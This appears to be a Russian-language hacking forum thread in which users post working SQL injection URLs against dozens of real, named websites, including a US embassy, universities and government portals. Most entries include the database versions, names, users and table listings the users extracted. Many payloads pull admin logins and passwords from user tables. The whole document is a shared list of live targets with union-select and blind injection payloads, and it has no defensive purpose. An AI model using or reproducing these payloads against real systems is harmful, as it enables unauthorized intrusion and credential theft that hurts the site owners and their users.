User name: sunbulashop@localhost

------------------------------------------------------------------------

http://www.opusmaxim.com/news.php?id=-99999+union+select+1,concat_ws(0x3a,username,passw ord),3,4,5,6+from+tbl_user--
Database Version: 5.0.77-community
Database name: wei10194_opus
User name: wei10194_opus@huklonsov022b.hostinguk.net

http://www.osumensvo.com/news/view_article.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*

Database Version: 5.0.45-community-log
Database name: 348781_vo
User name: 348781_web@172.16.10.85

http://www.osumensvo.com/news/view_article.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9+from+information_schema.tables/*

this is all tables

------------------------------------------------------------------------------------------------------------------------

http://www.usajewelryfactory.com/states.php?id=-46+union+select+1,version(),3,4/*

Database Version: 4.1.22-standard-log
Database name: jewelryf_jewelry
User name: jewelryf_jewel@localhost

http://www.arunima.edu.np/readdetail.php?type=highlights&id=-1+union+select+1,concat_Ws(0x3a,database(),user(), version()),3,4,5--

P.S у меня сеня-завтра Днюха :D пьют все :D

http://scaa.asn.au/consultants_directory.php?id=-5+UNION+SELECT+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--


Database Version: 5.0.51-log
Database name: lavarox_scaa
User name: lavarox_scaa@win20.qnetau.com
Os : PORTBLD-FREEBSD6.0

хотя все говорит о том что там винда..

http://www.whr.org.np/event/event.php?id=1+union+select+1,2,3,concat_Ws(0x3a,v ersion(),user(),database()),5,6,7--

4.1.22-standard:whrorg_user@localhost:whrorg_whrsanwedorg


http://www.nayagoreto.org.np/en/document.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--

5.0.67-community:nayagore_dbnewtrail:nayagore_goreto@loca lhost

PS еще 1 час 20 минут и мне 19)))):D гуляют все

http://www.aimia.com.au/i-cms?page=37'+and+substring(version(),1,1)=4--+



http://www.sanrio.ru/page/page.php?pgid=-12+or+1=1+and+substring(version(),1,1)=5

http://www.salon-medibat.com/fr/actualite.php?idact=-51+union+select+1,2,3,concat_ws(0x3a3a,id,login,ps wd),5,6+from+medibat_users+/*+

http://www.poissonrougepictures.com/fr/news.php?id=-39+union+select+1,2,3,user_name,password+from+admi n+/*+

http://www.akata.fr/news.php?cat=-4+UnIoN+SeLecT+1,database(),3,4,5,6,7,8,9+--+
akatav2

http://www.obskure.com/fr/kro_model.php?n_kro=-2818+union+select+1,null,3,concat_ws(0x3a3a,userna me,user_password,user_passchg,user_email)+from+zen ew_phpbb_users+--+

http://www.euspro.com
http://www.euspro.com/index.php?cat=-8+UNION+SELECT+0,1,2,concat_Ws(0x0b,user(),databas e(),versi on()),4,5,6+--+
aldakim_euspro@webua3.ukrhosting.com
aldakim_euspro
4.1.22-standard-log


http://yoga23.ks.ua
http://yoga23.ks.ua/index.php?cat=4+UNION+SELECT+0,concat_ws(0x0b,u ser(),version(),database()),2,3,4+LIMIT+9,3+--+
olvi@localhost
4.0.27-standard-log
olvi_yoga


http://yes.com.ua
http://yes.com.ua/greeting.php?cat=-13'+UNION+SELECT+0,co ncat_Ws(0x0b,us er(),version(),database()),2,3,4,5,6,7+--+
mypresent@127.0.0.1
4.0.27
mypresent_db2


http://apkonline.com.ua
http://apkonline.com.ua/mp/cat_sell.php?cid=-27+UNION+SELECT+0,concat_Ws(0x0b,use r(),version(),database()),2,3,4,5,6,7+--+
apkonlin_mpuser@localhost
4.1.22-standard
apkonlin_marketdb


http://www.temp21.kiev.ua
http://www.temp21.kiev.ua/?chp=obyav&rub=-2+UNION+SELECT+0,1,2,3,4,5,6,7,concat_ws(0x0b,us er(),version(),database()),9,10,11+--+&p=5/
temp21_dbtemp21@viper
4.1.22-log
temp21_temp21


http://www.finmarket.biz
http://www.finmarket.biz/lib/detail.php?cat=1&rub=2&id=-395+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x0 b,user(),version(),database()),11,12,13
usmdi@localhost
5.0.27
economics


http://www.kotiko.com.ua
http://www.kotiko.com.ua/art.php?art=-1352+UNION+SELECT+0,1,concat_Ws(0x0b,user(),versio n(),database()),3,4&cat=12
u_stbnwAiN@localhost
4.1.22
stbnwAiN

peterhof.ru

http://www.peterhof.ru/index.php?m=155&subject=-2867+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,concat_ws(0x0b,user(),database(),version()),17 ,18,19,20,21,22,23+--

u23911@78.108.81.211
b23911
5.0.67

http://budinak.by/
[PR: 3]

db info:
http://budinak.by/popup-door.php?id=-170+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),database(),user()),6,7,8,9,10,11,12,13
5.0.32-Debian_7etch5-log::budinakby::budinakby@localhost
admin:
http://budinak.by/popup-door.php?id=-170+union+select+1,2,concat_ws(0x3a,login,pass),4, 5,6,7,8,9,10,11,12,13+from+admins

http://www.archkku.org

Database Version: 5.0.51a-community
Database name: archkku_archkku
User name: archkku@localhost

users:
http://www.archkku.org/link/template.php?id=-5+union+select+1,group_concat(username,0x3a,user_p assword),3,4,5,6,7+from+archkku_mb.users--

http://www.bobr.net.ua/articles.php?id=-20+union+select+1,2,3,coNCAT_ws(chAR(42,32,42),use r(),database(),version()),5,6,7
amrita_amrita@s11* *amrita_amrita* *5.1.29-rc-log

brasilia.usembassy.gov

http://brasilia.usembassy.gov/index.php?action=recifemateria.php&id=-7914+union+Select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,0,1,2,3,4--

embusa@localhost
5.1.26-rc
embusa

http://www.e-lephant.org/Download.php?ID=685+UNION+SELECT+1,database(),3,4, password,6,7,user(),9,10,name,12,13,14,15,16,id,18 ,19,20,21,22,@@version_compile_os,24,25,26,27,28,2 9,version(),31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64+FROM+users+LIMIT+1,1--


Database Version: 5.0.51a-log
Database name: db239698340
User name: dbo239698340@74.208.16.109
Os : redhat-linux-gnu

http://climatecounts.org/scorecardlist.php?c=-13+UNION+SELECT+1,CONCAT_WS(0x3a,Version(),Databas e(),User()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

5.0.45:climatecounts:climatecounts@localhost

Внимание!!! 10000 - ДесятиТысячныйПост в теме Гг

http://www.mysilvercrest.de/de/kategorie.php?k=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,CONCAT(0x7873716C696E6A6265 67696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F, User(),0x7873716C696E6A656E64),19,20+LIMIT+1,1/*

Database Version: 4.0.18-log
Database name: dbsilvercrest
User name: heimpel@localhost

http://postgraduate.udsm.ac.tz/page.php?id=-1'+union+select+1,2,3,4,version(),6,7/*
Database Version: 5.0.22
Database name: postgraduate
User name: postgraduate@localhost

http://members.upstateartistsguild.org/member.php?ID=999999+union+select+concat_ws(0x3a,d atabase(),version(),user()),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23--
вывод в титлы
db151943372:4.0.27-max-log:dbo151943372@74.208.16.158
===============================================
PR 5
http://www.vermontfresh.net/member.php?ID=99999+union+select+concat_ws(0x3a,da tabase(),version(),user())--
вывод в титлы
vermontf_vfnDB:4.1.22-standard:vermontf_php@localhost
===============================================
PR 1
http://www.castmodeling.com/jie/Member.php?id=99999999+union+select+concat_ws(0x3a ,database(),version(),user())--
вывод в титлы
wwwdomo_dujie:4.1.22-standard:wwwdomo_dujie@localhost
===============================================
http://dmoose.com/Members/member.php?id=-13420+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,concat_ws(0x3a,database( ),version(),user()),24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
dmooseco_alphasigs:4.1.22-standard:dmooseco_dmoose@localhost

http://www.kbsnepal.com.np/article.php?action=view&id=1'+and+substring(version(),1,1)=5+--+

http://www.rokent.com/news.php?id=-66+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4--

4.1.22:rokcorp:foneport@localhost
http://www.spiritgotgame.net/archived_news.php?news_id=-2+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8,9,10,11--
4.0.15-log:spirit_got_game:spiritgotgame@localhost

http://fogel.gl.ciw.edu/news.php?newsid=146+and+substring(version(),1,1)=x


Version : 3.23.58

http://www.cali.gov.co/corporativo.php?id=1860%27+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9, 10,11+limit+1,1/*
version():5.0.26-Max
database():caligovco
user():portal@localhost
__
http://www.rao-ees.edu.ru/index.php?module=dsEnterprises&func=display&catid=2&eid=56+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user()),7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22+limit+1,1/*
version():4.0.18-log
database():hr_energo_ru
user():hrenergo@localhost
___
http://www.spsrasd.info/es/detail.php?id=594+union+select+1,2,3,4,5,concat_ws (0x3a,version(),database(),user()),7,8+limit+1,1
version():5.0.58
database():cms
user():spsrasd@localhost
___
http://www.tiemposevero.es/ver-reportaje.php?id=230%27+union+select+1,2,3,4,5,con cat_ws(0x3a,version(),database(),user()),7,8,9,10, 11,12,13+limit+1,1/*
version():5.0.45
database():spainsevereweather
user():tiemposevero@localhost
___
http://www.trailrunning.co.za/events_detail.php?id=179+union+select+1,2,concat_w s(0x3a,version(),database(),user()),4,5,6,7,8,9,10 ,11,12,13,14,15/*
version():5.0.32-Debian_7etch10
database():trailrun_db1
user():trailrun_1@dedi1146.nur4.host-h.net

http://www.canary.edu.np/news_and_notice.php?id=-1'+union+select+1,concat_Ws(0x3a,version(),user(), database()),3,4,5+--+

5.0.77-community:canarye_db@localhost:canarye_db

http://www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password) +from+mysql.user/*

http://www.emersonprint.com.au/news-details.php?ID=-1+union+select+1,version(),3,4,5,6,7,8/*

Database Version: 4.1.21-standard
Database name: emerspr_cms
User name: emerspr_cms@localhost

------------------------------------------------------------------------------------------------------------------------

http://www.ncsa.illinois.edu/AboutUs/People/contact.php?id=-775+union+select+1,version(),3,4,5,6,7,8,9,10--

Database Version: 5.0.67-log
Database name: website
User name: webRead@parrotia.ncsa.uiuc.edu

17 :In database website found table category_list 0 : ID 1 : name 2 : link_name 18 :In database website found table content_list 0 : ID 1 : name 2 : table_name 19 :In database website found table dir_table 0 : ID 1 : parent_dir 2 : name 20 :In database website found table division_content 0 : ID 1 : parent_div 2 : lead 3 : contact 4 : short_desc 5 : long_desc 6 : name 21 :In database website found table file_table 0 : ID 1 : dir_id 2 : file_name 3 : file_type 4 : page_id 22 :In database website found table image_content 0 : ID 1 : name 2 : URL 3 : ALT 23 :In database website found table links_content_table 0 : ID 1 : HREF 2 : title0 3 : title1 4 : title2 24 :In database website found table news_content_table 0 : ID 1 : title 2 : date 3 : release_date 4 : storyLink 5 : short_Blurb 6 : full_Story 7 : contact 8 : location 9 : category 10 : storyType 11 : images 12 : vid_link 25 :In database website found table page_table 0 : ID 1 : name 2 : title 3 : navtype 4 : navBox 5 : related 6 : external 7 : body 8 : style 9 : template 10 : keywords 26 :In database website found table people_content 0 : ID 1 : first_name 2 : last_name 3 : title 4 : email 5 : office 6 : phone 7 : division 8 : description 9 : client_id 27 :In database website found table people_test 0 : ID 1 : first_name 2 : last_name 3 : title 4 : email 5 : office 6 : phone 7 : division 8 : description 9 : client_id 28 :In database website found table project_content 0 : ID 1 : name 2 : group 3 : funding_source 4 : contact 5 : lead 6 : members 7 : partners 8 : short_desc 9 : long_desc 29 :In database website found table pubresearch_content 0 : ID 1 : title 2 : author 3 : link 4 : biblio 5 : category 6 : date 7 : publication_citation 8 : publication_abstract 9 : date_revised 10 : publication_grant 11 : pub_type 30 :In database website found table story_types 0 : name

nothing interesting

http://nuclear-coffee.com/ru/news.php?ID=-35+union+select+1,2,concat_ws(0x3a3a,ID,Link,Name, MainSite,ExampleURL),4+from+websites+--+

http://www.lesducsdangers.fr/news.php?ID=-823+union+select+1,concat_ws(0x3a3a,username,user_ password,user_level),3,4,5,6,7+from+forum_users+li mit+1,1+--+
http://www.lesducsdangers.fr/news.php?ID=-823+union+select+1,concat_ws(0x3a3a,user_type,user name,user_password,user_email),3,4,5,6,7+from+newf orum_users+limit+1,1+--+

http://www.swcrc.com/content.php?id=-43+union+select+1,2,3,4,group_concat(adminuser,cha r(58),adminpass),6,7,8,9,10,11+from+adminsetting+--+

[PR 6]
http://www.consulplan.net/noticias/noticia.php?id=-95+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,v ersion(),database(),user()))),6,7,8,9,10,11
4.1.18-nt-log:consulplan:consulplan_user@localhost
=================
[PR 5]
http://www.semanario.pt/seccao.php?id_seccao=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3--
4.0.16-standard-log:semanario:semanario@localhost
=================
[PR 4]
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15
5.0.22:tuktuk_web:tuktuk_user2550@localhost
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14,15+from+information_schema.t ables+where+table_schema!=0x696e666f726d6174696f6e 5f736368656d61+and+table_name%3E0x74756b74756b5f6d 6f645f70616765696e666f
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,group_concat(column_name ),7,8,9,10,11,12,13,14,15+from+information_schema. columns+where+table_name=0x74756b74756b5f737973746 56d5f75736572
data from table 'tuktuk_system_user'
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,concat_ws(0x3a,tuktuk_sy stem_user_ID,tuktuk_system_user_Name,tuktuk_system _user_Password),7,8,9,10,11,12,13,14,15+from+tuktu k_system_user
=================
[PR 4]
http://www.cenertec.pt/cursos.php?id=-80+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27
5.0.81-community:cenertec_site:cenertec_site@localhost

http://www.stevensgroup.org/page.php?id=-13+union+select+group_concat(username,0x3a,passwor d),2,3+from+users/*

Database Version: 4.1.22-standard
Database name: stevensg_msgdb
User name: stevensg_msgdb@localhost

--------------------------------------------------------------------------------------------------------------------------

PR 6

http://www.itr.unisa.edu.au/news/seminardetails.php?id=-549+union+select+1,2,3,4,5,6,7,8/*

Database Version: 5.0.22
User name: apache@dmzserver8.itr.unisa.edu.au

PR 5
http://www.chapman.com/newsevents.php?&CategoryID=55+union+select+1111,concat_ws(0x3a,dat abase(),version(),user()),3333,4444,5555,6666--
pnc_chapman:4.0.24-log:pnc_chapman@localhost
=====================================
PR 4
http://www.systems.ugent.be/member.php?id=9999999+union+select+1,2,3,4,5,6,7,c oncat_ws(0x3a,database(),version(),user()),9,10,11 ,12,13,14,15,16--
systems:5.0.51a-3ubuntu5.4:systems@webhost.ugent.be
=====================================
PR 4
http://www.irishphotographers.com/member.php?id=99999999+union+select+1,2,3,4,5,6,7, 8,9,10,11,concat_ws(0x3a,database(),version(),user ()),13,14,15,16,17,18,19--
natal_ippa:5.0.45-log:natal_ippa@web11.hosting365.ie

сербский банк..

http://www.bankmeridian.com/eng/viewnews1.php?section=99&text_id=366+and+substring(version(),1,1)=3/*

эх

http://www.sewmach.com.ua/cat.php?cat=23&art=-114++union+select+1,2,concat(user_login,0x3a,user_ passw),4,5,6+from+auth_users

Database Version: 5.0.67-log
Database name: sew-mach
User name: sew-mach@localhost

Линия красоты

http://www.beauty-line.com.ua/cat.php?nom=cat&firm=-5+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0 x7873716C696E6A656E64),2,3,4

Database Version: 4.1.22
Database name: gezanne
User name: gezanne@localhost

http://www.moe.com.np/terms.php?id=1'+union+select+1,2,3,4,5,6,7,user(), 9,10,11,12,13,14,15+--+

moecom_moe@localhost

http://onlinefoto.com.ua/backlinks/links.php?id=3092'

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,2/*

БД
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

Ток чет с таблицами никак не получается...:((

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SEL ECT+1,CONCAT(0x7873716C696E6A626567696E,Version(), 0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C 696E6A656E64)+LIMIT+1,1/*

БД
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

Ток чет с таблицами никак не получается...:((


http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,group_concat(tab le_name)+from+information_schema.tables+group+by+t able_schema+limit+2,1/*

а ты крути руками а не SIPT'om

http://www.bintec.ru/?mod=SiteNews&act=7&id=-1+union+select+1,concat_ws(0x3a,login,PASSWORD),3, 4,5,6+from+ssp_AdminSet--+

PR 5
http://mahatma.com/php/showNews.php?newsid=67&linkid=16+and+substring(version(),1,1)=x



Version : 5.0.81-community
Database : mahatmam_comdb
User : mahatmam_mahatma@localhost
Os : pc-linux-gnu


и сиптом все получается, главное запрос составить как надо...

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SELECT+1,AES_DECRYPT(AES_ ENCRYPT(CONCAT(0x7873716C696E6A626567696E,TABLE_NA ME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C6 96E6A656E64),0x71),0x71)+FROM+INFORMATION_SCHEMA.T ABLES+LIMIT+45,1/*

16 :In database information_schema found table USER_PRIVILEGES
1 : GRANTEE
2 : TABLE_CATALOG
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
17 :In database information_schema found table VIEWS
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : VIEW_DEFINITION
5 : CHECK_OPTION
6 : IS_UPDATABLE
7 : DEFINER
8 : SECURITY_TYPE
18 :In database onlinefoto found table replinks
1 : id
2 : linkdata
19 :In database onlinefoto found table sph_admins
1 : admin_id
2 : login
3 : password
bla bla bla

http://www.nirmaljoshi.com.np/jokes.php?id=-1'+union+select+1,2,3,unhex(hex(concat_ws(0x3a,use r(),database(),version()))),5,6+--+


siddhant123_data@82.197.131.19:siddhant123_data:4. 1.18-log

####################################
http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,version(),4,5,6,7--

5.0.77-community


admin:

http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,group_concat(column_name),4,5,6 ,7+from+information_schema.columns+where+table_nam e=0x75736572--

http://www.russellmania.com/index.php?id=35&dvd_id=-1137+union+select+version()--

Database Version: 5.0.77-community
Database name: mania_cms
User name: mania_user@localhost

http://www.milnerton.co.za/details.php?id=2965++union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,concat_ws(0x3a,version(),database(), user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58+limit+1,1/*
version():5.0.38-Debian_2-log
database():milnertondb
user():34_milnertondb@localhost

Есть таблица prop_admin
__
http://www.rvtech.co.za/NewsView.php?Id=1+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5+limit+1,1/*
version():5.0.32-Debian_7etch10
database():rvtech_db1
user():rvtech_1@dedi185.nur4.host-h.net

Есть таблица User

http://www.clownage.fr/paroles.php?id=-9+union+select+1,group_concat(column_name),3,4+fro m+information_schema.columns+where+table_name=0x63 6C5F6E657773+/*+

http://www.sko-meteo.kz/view_date.php?date=2008-03'+UnIoN+SeLecT+1,table_name,3,4,5,6,7,8+from+inf ormation_schema.tables+--+

http://www.granjard.fr/ameublement.php?id=-13+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,p assword),7+from+user+/*+

http://psr-quad.com/fiche_produit.php?proid=-520+UnIon+SeLect+1,2,3,4,5,concat_ws(0x3a3a,login, password),7,8,9,10,11,12,13,14+from+user+--+

PS Где тут админки ???

PR 4
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, database(),version(),user()),9--
suwalki_glowna:4.1.22-standard:suwalki_glowna@localhost

юзвери:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, mail,nick,pass),9+from+users--
админы:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, mail,nick,pass),9+from+admins--
===============================================
PR 4
http://www.thecancer.net/category.php?id=-42+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3--
d60237022:5.0.77-log:u70254108@cgihost
===============================================
PR 3
http://www.nigelwhitfield.com/v2/article.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t(database(),0x3a,version(),0x3a,user()),1),1),5,6 ,7--
nwcomContent:4.1.16:nwcom@localhost

http://www.suffolksharks.com/game.php?id=-13+union+select+memberlogin,memberpassword+from+Me mbers--

Database Version: 5.0.67.d7-ourdelta-log
Database name: suffolksharks
User name: suffolksharks@72.167.183.54

----------------------------------------------------------------------------------------------------

http://www.mblturismo.com.br/lermateria.php?id=-3+union+select+1,version(),3,4,5,6--

Database Version: 5.0.77-community
Database name: mblturi_dbmbl
User name: mblturi_daniel@localhost

----------------------------------------------------------------------------------------------------

PR 6
http://www.unf.edu/development/news/pressreleases/releaseview.php?id=-586+union+select+1,2,version(),4/*

Database Version: 4.1.22
Database name: news
User name: newsuser@localhost

http://nnv.nepalnews.com.np/videoplay1.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--

4.1.22-standard:nnvdo_nnvdodb@localhost:nnvdo_nnv


########################################

http://www.jiou-li.com.tw/modules/shop/shop_view.php?id=1&pid=215+and+substring(version(),1,1)=5--

http://www.sweatclubs.com/partner-physicians.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,vchUserName, vchUserPassword),6+from+BIM_UserMaster--

Database Version: 5.0.83-log
Database name: sweat
User name: cpt12345@localhost

moemesto.ru pr-7 тИЦ 2700

http://moemesto.ru/tags/%E4%EE%EC'%0bunion%0bselect%0bversion()--%0b/

5.0.45-log

К сожалению длина значения вставляемого через ЧПУ ограничена(мб регулярка в .htaccess и режет) поэтому from и etc не влезет уже...

http://sms-fun.org/viewjokes.php?id=2652+and+substring(version(),1,1) =5

http://www.india6666.com/jokes/viewjokes-114+and+substring(version(),1,1)=5--+.html

http://kannadahanigalu.com/viewjokes.php?jokes=252&id=3592+and+substring(version(),1,1)=5

http://www.coolstuffs.in/jokes/jokescript/tamil_jokes/viewjokes.php?7325&id=3463+and+substring(version(),1,1)=5

http://www.kryshavel.by/photos.php?fotosectionid=-2+union+select+1,2,3,4,concat_ws(0x0b,version(),us er(),database()),6/*&kind=Rocky

5.0.32-Debian_7etch5-log
kryshavelby@localhost
kryshavelby


Таблички:
http://www.kryshavel.by/photos.php?fotosectionid=-2+union+select+1,2,3,4,group_concat(0x0b,table_nam e),6+from+information_schema.tables+group+by+table _schema+limit+1,1/*&kind=Rocky
items,
docs,
security,
materialgroup,
faqs,
dillermessages,
statistic,
news,
fotos,
dillerprices,
params,
fotosections,
dillers,
prices

Не знаю, байан или нет, антибайан в дауне сейчас...

http://bla-bla-bla.ru/zags/brak.php?id=-920+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,concat_ws(0x3a,version(),user(), database()),22,23
5.0.45:user_blablablaru@localhost:bla-bla-bla_ru

PR 4
http://www.agoraquest.com/article.php?sid=99999999+union+select+1,2,3,4,5,co ncat_ws(0x3a,database(),version(),user()),7,8,9--
PR 3
http://www.marlowconnell.com/member.php?ID=9999+union+select+1,concat_ws(0x3a,d atabase(),version(),user()),3,4,5,6,7,8,9--
PR 2
http://www.ktimalaniti.com/article.php/section.php?id=99999+union+select+concat_ws(0x3a,d atabase(),version(),user()),2--
--------------------------------------
http://www.ppabc.com/member.php?id=999999+union+select+1,2,concat_ws(0x 3a,database(),version(),user()),4,5--
http://en.ludeales.com/member.php?id=9999999+union+select+concat_ws(0x3a, database(),version(),user()),2,3,4--
http://www.medic.org.ru/library/cat/sex.php?id=-1+union+selecT+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11--
http://mebelinfo.biz/article.php?id=99999+union+select+1,2,concat_ws(0x 3a,database(),version(),user()),4,5,6--